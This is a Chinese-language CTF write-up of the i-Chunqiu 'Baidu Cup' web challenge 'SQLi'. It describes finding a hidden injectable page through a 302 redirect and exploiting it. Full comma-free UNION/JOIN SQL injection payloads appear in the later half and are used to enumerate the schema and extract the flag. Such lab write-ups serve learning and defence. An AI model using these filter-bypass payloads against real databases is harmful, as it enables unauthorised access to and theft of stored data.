“百度杯”CTF比赛九月场类型：Web题目名称：SQLi---不需要逗号的注入技巧

今天在i春秋做题的时候遇到了一道非常好的题目，于是在参考了wp的基础上自己复现了一遍，算作一种技巧的学习与收藏吧。
题目i春秋连接：https://www.ichunqiu.com/battalion?t=1&r=54791
访问地址，发现什么都没有，

查看页面源代码，发现提示

访问地址
http://69ef94c7ef5e47b580ed5c7bae472bc4c3b492503f964143.game.ichunqiu.com/login.php?id=1
得到下面页面

我去，不会这就注入进去了吧？！话不多说，上sqlmap，

尝试了好多次，发现这就是个假的注入点，果然没那么简单啊，，，，
设置代理，利用工具Burp Suite看看究竟发生了什么，，，
可以看到在访问地址
http://69ef94c7ef5e47b580ed5c7bae472bc4c3b492503f964143.game.ichunqiu.com的时候，302，页面重定向了。
注意看，下面两个图片


在302重定向回复报文中，url已经改变，原来箭头那里是3l,被重定向到31，6不6，哈哈。并且看到了新的页面地址l0gin.php?id=1
访问地址
http://69ef94c7ef5e47b580ed5c7bae472bc4c3b492503f964143.game.ichunqiu.com/l0gin.php?id=1
得到下图

修改参数，再次执行，

OK，看来这个确实是一个注入点，再用sqlmap测试，从结果可以看到这既是一个基于布尔的盲注，也是一个基于时间的盲注

接着爆数据库，发现无法得到，没办法，只能手工注入了，
这里我选择基于布尔的盲注，因为这样的回显比基于时间的看起来明显。
输入参数
1' and ascii(substr((select database()),1,1))>64 %23
查询数据库名，发现，注入失败，并且,后面的sql语句被过滤掉了，id字段输出的应该就是过滤后的sql语句了

从网上看到一篇讲不需要逗号的mysql注入文章，http://wonderkun.cc/index.html/?p=442
于是重新构造payload，如id=-1' union select * from (select group_concat(distinct(table_schema)) from information_schema.tables ) a join (select version() ) b %23
可以看到数据库名称为sqli

紧接着，构造payload，获取表名
-1' union select * from (select group_concat(distinct(table_name)) from information_schema.tables where table_schema='sqli') a join (select version() ) b %23

构造payload，获取字段名
-1' union select * from (select group_concat(distinct(column_name)) from information_schema.columns where table_schema='sqli' and table_name='users') a join (select version() ) b %23

构造payload，获取字段值，得到flag{34303304-de0b-4bad-a0df-84eb8a420df8}
-1' union select * from (select group_concat(distinct(flag_9c861b688330)) from users) a join (select version() ) b %23